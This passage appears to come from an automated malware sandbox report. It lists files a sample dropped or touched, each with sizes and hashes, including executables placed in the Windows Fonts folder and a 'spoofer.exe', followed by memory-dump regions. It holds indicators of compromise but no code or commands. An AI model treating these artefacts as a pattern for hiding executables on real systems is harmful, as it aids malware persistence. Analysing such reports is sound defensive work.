                                                                                                                            fde52bf5e7d403879e5eafec0b99ed63d6f39106bf782d81b0599661072ffdad745ac448adb556caa86ab8269ddaa5f102586b4480a9924a32c6b473ab53ec3a

                                                                                                                          • C:\Users\Admin\AppData\Local\Tempcsgzsiiggo.db

                                                                                                                            Filesize

                                                                                                                            112KB

                                                                                                                            MD5

                                                                                                                            53a0340dd0493d4f87399a76697daec1

                                                                                                                            SHA1

                                                                                                                            d93d4a5685ec91c8936321d2bbe32fb9473d2be2

                                                                                                                            SHA256

                                                                                                                            273ecc23620be145901f467902106a2459dfdef25d8ec3e740929c37f98a8e01

                                                                                                                            SHA512

                                                                                                                            f36d9eb224663a133816de90831b936b5b62d67faf91889c7b1613032e3c6f6f9da7fdc4d9aa0104dcbdf2b7c452d12a93aeb8192285fbebde00e5b628aa4c04

                                                                                                                          • C:\Users\Admin\AppData\Local\Tempcskjuygdik.db

                                                                                                                            Filesize

                                                                                                                            20KB

                                                                                                                            MD5

                                                                                                                            a603e09d617fea7517059b4924b1df93

                                                                                                                            SHA1

                                                                                                                            31d66e1496e0229c6a312f8be05da3f813b3fa9e

                                                                                                                            SHA256

                                                                                                                            ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

                                                                                                                            SHA512

                                                                                                                            eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

                                                                                                                          • C:\Users\Admin\AppData\Local\Tempcsnpuquevz.db

                                                                                                                            Filesize

                                                                                                                            46KB

                                                                                                                            MD5

                                                                                                                            14ccc9293153deacbb9a20ee8f6ff1b7

                                                                                                                            SHA1

                                                                                                                            46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

                                                                                                                            SHA256

                                                                                                                            3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

                                                                                                                            SHA512

                                                                                                                            916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

                                                                                                                          • C:\Users\Admin\AppData\Local\Tempcsrdhttkkd.db

                                                                                                                            Filesize

                                                                                                                            40KB

                                                                                                                            MD5

                                                                                                                            a182561a527f929489bf4b8f74f65cd7

                                                                                                                            SHA1

                                                                                                                            8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                            SHA256

                                                                                                                            42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                            SHA512

                                                                                                                            9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_99B861ABDC8B4DE89D9B9C502E792D47.dat

                                                                                                                            Filesize

                                                                                                                            940B

                                                                                                                            MD5

                                                                                                                            b56705ccffaa5865ae3a3b1e483a8aed

                                                                                                                            SHA1

                                                                                                                            c37b224e97926a53fff20188c8e326922904217a

                                                                                                                            SHA256

                                                                                                                            a6797a39eab860c8ffcaf8a4c6cefd13de317b854a4c6dee159fb9a0d3024c3d

                                                                                                                            SHA512

                                                                                                                            196307ed5e43a402d53a6542370a25d83ec450d66074e6465c7cd267691413df96684f478ea15deb046a90777cdd5c09faa7493a5ad6d6d25b8ece2e8dd9d399

                                                                                                                          • C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier

                                                                                                                            Filesize

                                                                                                                            58B

                                                                                                                            MD5

                                                                                                                            37da88b521d433509b41a4f658730dbe

                                                                                                                            SHA1

                                                                                                                            2ea39c5e0b87a0717eac738f9ae92be8771fd576

                                                                                                                            SHA256

                                                                                                                            62ba564e8b8b6fba4ae004166cddac5e232f0b2d06dd97c0e4656571adfe7d84

                                                                                                                            SHA512

                                                                                                                            98a00650022e0e36e748714b92b6beaebc3afa3c7a5baab8cecd155091d7acac94dbec0fb9c7c2c24c07e0ac7068058926de85bf10ed4e7a3b634d47119ea832

                                                                                                                          • C:\Users\Admin\Downloads\Debug.rar:Zone.Identifier

                                                                                                                            Filesize

                                                                                                                            108B

                                                                                                                            MD5

                                                                                                                            ebb8ddb27232b17bb750f85836c3c438

                                                                                                                            SHA1

                                                                                                                            f8fa2e8ac6cd7f17a340ba5e10789c2276d088f1

                                                                                                                            SHA256

                                                                                                                            e09ee0c17de7b34539b625e7c687d446d8b085e51a1006dc9db95c562e12141e

                                                                                                                            SHA512

                                                                                                                            04d672b0544982cf2a6e7f9d67e5d0d66b05408c9d1e9a14f37d2b9b6dfa99ccc2592deec0ade9c3b84f1fa571a5e85c13e0c9296ed5f27fe24c42653650e127

                                                                                                                          • C:\Users\Admin\Downloads\Debug\Guna.UI2.dll

                                                                                                                            Filesize

                                                                                                                            2.1MB

                                                                                                                            MD5

                                                                                                                            c19e9e6a4bc1b668d19505a0437e7f7e

                                                                                                                            SHA1

                                                                                                                            73be712aef4baa6e9dabfc237b5c039f62a847fa

                                                                                                                            SHA256

                                                                                                                            9ac8b65e5c13292a8e564187c1e7446adc4230228b669383bd7b07035ab99a82

                                                                                                                            SHA512

                                                                                                                            b6cd0af436459f35a97db2d928120c53d3691533b01e4f0e8b382f2bd81d9a9a2c57e5e2aa6ade9d6a1746d5c4b2ef6c88d3a0cf519424b34445d0d30aab61de

                                                                                                                          • C:\Users\Admin\Downloads\Debug\spoofer.exe

                                                                                                                            Filesize

                                                                                                                            1.8MB

                                                                                                                            MD5

                                                                                                                            afb41c3a131b18935370a3ca024ccfdd

                                                                                                                            SHA1

                                                                                                                            6b9875e63f4c7ed674800cd1ba5fbdc9cb008073

                                                                                                                            SHA256

                                                                                                                            7f6aea9786cfb0cf69089ac5017feba19cf8dd8b9277855a013b7fe9a4a6341b

                                                                                                                            SHA512

                                                                                                                            5e5c58ca8f2675451ac5bdfa41599ede346c6dec49ad15c328144e9c3a86631bbe660bea48fc7de92b436455906e1ca305d6219100d776b0aa2dd69c18e557e7

                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 604939.crdownload

                                                                                                                            Filesize

                                                                                                                            4.0MB

                                                                                                                            MD5

                                                                                                                            58641b57e9cea6bca921a3c1697562d9

                                                                                                                            SHA1

                                                                                                                            a1194a77a54704e5c9d7b565e24cfa2ade8c2be6

                                                                                                                            SHA256

                                                                                                                            0656dedafd7aff40a52892f848416ca1c99d5e78988c8d530e545b933ee6c4bf

                                                                                                                            SHA512

                                                                                                                            03b1404600d6ce787cd73ed5c06d37f05dd94c601447a67041e32aeb8056f65373bd2365ce70533d9d5309a24a3df00e7226f4fec90b4b04f909c73f701e591b

                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 605578.crdownload

                                                                                                                            Filesize

                                                                                                                            1.5MB

                                                                                                                            MD5

                                                                                                                            f1320bd826092e99fcec85cc96a29791

                                                                                                                            SHA1

                                                                                                                            c0fa3b83cf9f9ec5e584fbca4a0afa9a9faa13ed

                                                                                                                            SHA256

                                                                                                                            ad12cec3a3957ff73a689e0d65a05b6328c80fd76336a1b1a6285335f8dab1ba

                                                                                                                            SHA512

                                                                                                                            c6ba7770de0302dd90b04393a47dd7d80a0de26fab0bc11e147bf356e3e54ec69ba78e3df05f4f8718ba08ccaefbd6ea0409857973af3b6b57d271762685823a

                                                                                                                          • C:\Windows\Fonts\1.exe

                                                                                                                            Filesize

                                                                                                                            63KB

                                                                                                                            MD5

                                                                                                                            a0fd1bbe11aa551f25e0ba46deffb0e5

                                                                                                                            SHA1

                                                                                                                            cef9edd0133e197895d41315d74aed9718317e74

                                                                                                                            SHA256

                                                                                                                            beef3d42fdc49d95d5b6b361711a2b8d1303dad8687f6182052929b348eaf93c

                                                                                                                            SHA512

                                                                                                                            dd4036fccc67678eaf65f4400d1cab239d9693d2a410c5f3ba88a3b2b3a3188dda926e9e56f60e2db4bf8477d795fb9c85c216dc293b8ee6002cbbca02f31b28

                                                                                                                          • C:\Windows\Fonts\Ethone.exe

                                                                                                                            Filesize

                                                                                                                            83KB

                                                                                                                            MD5

                                                                                                                            bab6568e3526ebd18d199fb890348bca

                                                                                                                            SHA1

                                                                                                                            ce02eb08d6a06d4940338dfa4ea2c05997237037

                                                                                                                            SHA256

                                                                                                                            68ae2cda8e26be8760a8411e63c50d05b605c654d66b59d923207e24de9bebb2

                                                                                                                            SHA512

                                                                                                                            73338f52356b9ffff1b1a769d0b0f2006284657b06021f9ba96eea3ca2554c247b4ea5e44e99a9546fc958af10aac734d600a21a64f41250bb67e9c428886e19

                                                                                                                          • C:\Windows\Fonts\Update.exe

                                                                                                                            Filesize

                                                                                                                            66KB

                                                                                                                            MD5

                                                                                                                            e7213ad78227e9369c7f6ebb724eb329

                                                                                                                            SHA1

                                                                                                                            8713eac711fcd717648f6a55fadaf358a804af1c

                                                                                                                            SHA256

                                                                                                                            065d5646ed39bfe652cab38b2b7cc7be6dd48ada763c74f066b427bbb4577908

                                                                                                                            SHA512

                                                                                                                            e7531d801aec5bb06c3aaaedd18ae947ba75c434a4ae3aa15a5bf8b91a3245638f51e87ceaac3f7a62d3f656fb5260b39166476e901b93b474e0015ac72d7c24

                                                                                                                          • C:\Windows\Fonts\tak.exe

                                                                                                                            Filesize

                                                                                                                            17.6MB

                                                                                                                            MD5

                                                                                                                            1fbdf60159f7bbd3cdd742bb2cef54e8

                                                                                                                            SHA1

                                                                                                                            13da0172871e62ff3fc9afdcd250dd3682b12f7c

                                                                                                                            SHA256

                                                                                                                            6d1045fff9bd1a0b1230564d4986d5ac7205fe854050b68c64a54991e1c70805

                                                                                                                            SHA512

                                                                                                                            6cccd11166671352289d4c7f8f9673362a728b9079fabe44a95955525557718c450bb7f1699bf4ffc9073fbfe6e541ff4d113ba3a30039ea2e0c61fa680339dd

                                                                                                                          • memory/676-763-0x0000000000C40000-0x0000000000C56000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            88KB

                                                                                                                          • memory/1096-770-0x000001ECF06E0000-0x000001ECF0702000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            136KB

                                                                                                                          • memory/2692-739-0x0000000000380000-0x0000000000396000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            88KB

                                                                                                                          • memory/3336-1027-0x000000001B7C0000-0x000000001B7CC000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            48KB

                                                                                                                          • memory/3336-1212-0x000000001D920000-0x000000001DC70000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            3.3MB

                                                                                                                          • memory/3336-751-0x0000000000A70000-0x0000000000A8C000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            112KB

                                                                                                                          • memory/4756-709-0x0000000000100000-0x00000000002D0000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1.8MB

                                                                                                                          • memory/4756-719-0x0000000006130000-0x000000000613A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            40KB

                                                                                                                          • memory/4756-717-0x00000000050C0000-0x0000000005152000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            584KB

                                                                                                                          • memory/4756-716-0x00000000055D0000-0x0000000005B76000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/4756-715-0x0000000004EC0000-0x0000000004FAC000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            944KB

                                                                                                                          • memory/4756-724-0x0000000007240000-0x00000000072EA000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            680KB

                                                                                                                          • memory/4756-723-0x0000000006520000-0x0000000006734000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.1MB

                                                                                                                          • memory/4756-718-0x0000000005160000-0x00000000051C6000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            408KB